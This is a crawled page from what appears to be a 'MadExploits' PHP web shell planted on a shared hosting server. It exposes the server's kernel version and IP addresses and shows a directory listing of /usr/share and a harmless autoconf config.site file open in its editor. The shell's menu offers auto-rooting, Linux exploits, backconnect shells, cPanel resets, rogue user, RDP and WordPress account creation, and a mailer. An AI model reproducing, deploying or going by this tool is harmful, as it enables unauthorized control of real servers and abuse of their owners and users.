Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.119.130.36
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
[ HOME SHELL ]
Name
Size
Permission
Action
GeoIP
[ DIR ]
drwxr-xr-x
Modules
[ DIR ]
drwxr-xr-x
aclocal
[ DIR ]
drwxr-xr-x
aclocal-1.16
[ DIR ]
drwxr-xr-x
adobe
[ DIR ]
drwxr-xr-x
autoconf
[ DIR ]
drwxr-xr-x
automake-1.16
[ DIR ]
drwxr-xr-x
awk
[ DIR ]
drwxr-xr-x
bash-completion
[ DIR ]
drwxr-xr-x
bison
[ DIR ]
drwxr-xr-x
cmake
[ DIR ]
drwxr-xr-x
cracklib
[ DIR ]
drwxr-xr-x
crypto-policies
[ DIR ]
drwxr-xr-x
emacs
[ DIR ]
drwxr-xr-x
enchant
[ DIR ]
drwxr-xr-x
file
[ DIR ]
drwxr-xr-x
fontconfig
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
ghostscript
[ DIR ]
drwxr-xr-x
git-core
[ DIR ]
drwxr-xr-x
gnupg
[ DIR ]
drwxr-xr-x
groff
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
info
[ DIR ]
drwxr-xr-x
l.v.e-manager
[ DIR ]
drwxr-xr-x
libgpg-error
[ DIR ]
drwxr-xr-x
libtool
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
lve-stats
[ DIR ]
drwxr-xr-x
man
[ DIR ]
drwxr-xr-x
mc
[ DIR ]
drwxr-xr-x
misc
[ DIR ]
drwxr-xr-x
modulefiles
[ DIR ]
drwxr-xr-x
myspell
[ DIR ]
drwxr-xr-x
mysql
[ DIR ]
drwxr-xr-x
nano
[ DIR ]
drwxr-xr-x
perl5
[ DIR ]
drwxr-xr-x
python-cllib
[ DIR ]
drwxr-xr-x
screen
[ DIR ]
drwxr-xr-x
snmp
[ DIR ]
drwxr-xr-x
tabset
[ DIR ]
drwxr-xr-x
tcl8
[ DIR ]
drwxr-xr-x
tcl8.6
[ DIR ]
drwxr-xr-x
terminfo
[ DIR ]
drwxr-xr-x
vim
[ DIR ]
drwxr-xr-x
xml
[ DIR ]
drwxr-xr-x
zoneinfo
[ DIR ]
drwxr-xr-x
zsh
[ DIR ]
drwxr-xr-x
config.site
880
B
-rw-r--r--
magic
940.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.site
# This is the config.site file to satisfy FHS defaults when installing below # /usr. # # You may override this file by your config.site using the CONFIG_SITE env # variable. # # Note: This file includes also RHEL/Fedora fix for installing libraries into # "/lib/lib64" on 64bit systems. if test -n "$host"; then # skip when cross-compiling return 0 fi if test "$prefix" = /usr \ || { test "$prefix" = NONE && test "$ac_default_prefix" = /usr ; } then test "$sysconfdir" = '${prefix}/etc' && sysconfdir=/etc test "$sharedstatedir" = '${prefix}/com' && sharedstatedir=/var test "$localstatedir" = '${prefix}/var' && localstatedir=/var ARCH=`uname -m` for i in x86_64 ppc64 s390x aarch64; do if test $ARCH = $i; then test "$libdir" = '${exec_prefix}/lib' && libdir='${exec_prefix}/lib64' break fi done fi
Close